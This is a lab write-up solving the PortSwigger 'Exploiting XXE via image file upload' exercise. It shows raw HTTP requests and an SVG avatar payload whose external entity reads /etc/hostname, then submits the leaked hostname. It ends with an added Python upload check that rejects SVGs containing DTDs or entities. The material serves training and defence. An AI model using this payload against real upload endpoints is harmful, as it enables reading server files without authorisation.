PortSwigger: Exploiting XXE via image file upload
Solution
Open post
GET /post?postId=5 HTTP/2
Host: 0af300dc04515e8d80a0e9d900f30005.web-security-academy.net
Cookie: session=ipdoKrPEFfP8WfPgnwdnVNFHlZ1qcZwg
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0af300dc04515e8d80a0e9d900f30005.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Send request with payload
Payload:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
---
Request
POST /post/comment HTTP/2
Host: 0af300dc04515e8d80a0e9d900f30005.web-security-academy.net
Cookie: session=ipdoKrPEFfP8WfPgnwdnVNFHlZ1qcZwg
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------203983310142011218401884526176
Content-Length: 1261
Origin: https://0af300dc04515e8d80a0e9d900f30005.web-security-academy.net
Referer: https://0af300dc04515e8d80a0e9d900f30005.web-security-academy.net/post?postId=5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

-----------------------------203983310142011218401884526176
Content-Disposition: form-data; name="csrf"

bfFPqi334Ho3h9007GauAMxL1chlY71J
-----------------------------203983310142011218401884526176
Content-Disposition: form-data; name="postId"

5
-----------------------------203983310142011218401884526176
Content-Disposition: form-data; name="comment"

test
-----------------------------203983310142011218401884526176
Content-Disposition: form-data; name="name"

pentester
-----------------------------203983310142011218401884526176
Content-Disposition: form-data; name="avatar"; filename="file.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
-----------------------------203983310142011218401884526176
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------203983310142011218401884526176
Content-Disposition: form-data; name="website"

http://localhost.pl
-----------------------------203983310142011218401884526176--
Read hostname from image
View source: https://0af300dc04515e8d80a0e9d900f30005.web-security-academy.net/post?postId=5 (line 101)
<img src="/post/comment/avatars?filename=1.png" class="avatar"> <a id="author" href="http://localhost.pl">pentester</a> | 14 January 2026
---
Open website: https://0af300dc04515e8d80a0e9d900f30005.web-security-academy.net/post/comment/avatars?filename=1.png
GET /post/comment/avatars?filename=1.png HTTP/1.1
Host: 0af300dc04515e8d80a0e9d900f30005.web-security-academy.net
Cookie: session=ipdoKrPEFfP8WfPgnwdnVNFHlZ1qcZwg
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
Submit solution
Hostname: 5f65ea1bc8b3
---
Request
POST /submitSolution HTTP/2
Host: 0af300dc04515e8d80a0e9d900f30005.web-security-academy.net
Cookie: session=ipdoKrPEFfP8WfPgnwdnVNFHlZ1qcZwg
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
Origin: https://0af300dc04515e8d80a0e9d900f30005.web-security-academy.net
Referer: https://0af300dc04515e8d80a0e9d900f30005.web-security-academy.net/post?postId=5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

answer=5f65ea1bc8b3
Solved
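Mitigation (added example, not part of the original write-up or the lab's code): the hostname ended up in the rendered avatar because the server's XML parser accepted the DOCTYPE in file.svg and expanded the external entity. A server-side upload check that refuses any SVG carrying a DTD or entity declaration stops this before the image is rendered. The function and constant names below are assumptions; BENIGN_SVG is a constructed sample.

```python
from xml.parsers import expat

SVG_ROOT = "http://www.w3.org/2000/svg svg"  # namespace URI + local name

class UnsafeSvg(ValueError):
    """Upload contains XML constructs that enable XXE, or is not an SVG."""

def check_svg_upload(data: bytes) -> None:
    """Raise UnsafeSvg unless data is well-formed, DTD-free SVG."""
    parser = expat.ParserCreate(namespace_separator=" ")
    roots = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeSvg(f"DOCTYPE not allowed (name={name!r})")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeSvg(f"entity declaration not allowed ({name!r})")

    def on_external_ref(context, base, sysid, pubid):
        raise UnsafeSvg(f"external entity not allowed ({sysid!r})")

    def on_start(name, attrs):
        if not roots:
            roots.append(name)  # remember only the document element

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        raise UnsafeSvg(f"not well-formed XML: {exc}") from exc
    if roots != [SVG_ROOT]:
        raise UnsafeSvg(f"root element is not <svg>: {roots}")

def is_accepted(data: bytes) -> bool:
    try:
        check_svg_upload(data)
        return True
    except UnsafeSvg:
        return False

# The file.svg body from the upload request above.
PAGE_SVG = b"""<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>"""
# Constructed benign avatar for comparison.
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" width="128px" height="128px"><text x="0" y="16">hi</text></svg>'
```

The check only gates the upload; the library that rasterises the SVG should also be configured with DTD processing and external entity resolution disabled.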